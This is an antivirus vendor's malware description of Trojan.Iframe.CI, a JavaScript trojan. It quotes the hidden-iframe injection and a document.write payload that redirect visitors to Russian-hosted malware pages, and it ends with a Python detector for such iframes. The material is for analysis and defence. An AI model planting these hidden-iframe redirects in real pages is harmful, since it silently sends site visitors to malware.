
Trojan.Iframe.CI


First posted on 21 November 2011.
Source: BitDefender

Aliases:

Trojan.Iframe.CI is also known as Trojan-Clicker.JS.Agent.h, TrojanDownloader:JS/Psyme.gen.

Explanation:

This is a malicious JavaScript file that a user may unknowingly download when visiting various infected websites. It contains code that displays a hidden iframe:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>

and encrypted code which points to:

<SCRIPT>window.status='Done';document.write('<iframe name=[random_nr] src='http://77.221.133.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]' width=303 height=93 style='display: none'></iframe>')</SCRIPT>

and redirects the browser to a malicious website:

"http://77.221.133.X/.if/go.html?[random_nr]", served from an IP address hosted in Russia ([removed]atapoint.ru).

Once there, the user may be infected with other malware and be redirected to pages like:

http://77.221.133.X/.dif/go.php?sid=1
http://77.221.133.X/.sp/in.cgi?p=o

which also contain hidden iframes:

<iframe src="http://77.221.133.X/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
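
One way to audit served pages for the hidden-iframe forms quoted above (1x1 or 0x0 size, visibility: hidden, display: none, including plain-text markup passed to document.write); this is an added example, not BitDefender's detection logic. It only sees plain-text markup, so the encrypted variant has to be decoded, or the rendered DOM inspected, before this check applies. The sample HTML, its example.test hosts, and the class and function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on the iframe forms quoted above; example.test hosts are placeholders.
SAMPLE = """<iframe src='http://a.example.test/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>document.write("<iframe src='http://b.example.test/go.html' width=303 height=93 style='display: none'></iframe>")</script>
<iframe src="http://c.example.test/go.php?sid=1" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 SCROLLING=no></iframe>
<iframe src="http://video.example.test/embed" width="560" height="315"></iframe>"""

def _leading_int(value):
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

class HiddenIframeFinder(HTMLParser):  # collects (src, reasons, via_script) tuples
    def __init__(self, via_script=False):
        super().__init__()
        self.findings, self.via_script, self._script = [], via_script, None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []  # start buffering the script body
        if tag != "iframe":
            return
        a = {k: v or "" for k, v in attrs}  # attribute names arrive lowercased
        style = a.get("style", "").lower().replace(" ", "")
        reasons = [r for r in ("visibility:hidden", "display:none") if r in style]
        w, h = _leading_int(a.get("width")), _leading_int(a.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append(f"size:{w}x{h}")
        if reasons:
            self.findings.append((a.get("src", ""), reasons, self.via_script))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            # Plain-text iframe markup inside a script string (document.write).
            for m in re.finditer(r"<iframe\b[^>]*>", "".join(self._script), re.I):
                sub = HiddenIframeFinder(via_script=True)
                sub.feed(m.group(0))
                self.findings += sub.findings
            self._script = None

def find_hidden_iframes(html):
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings
```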

Last update 21 November 2011

 
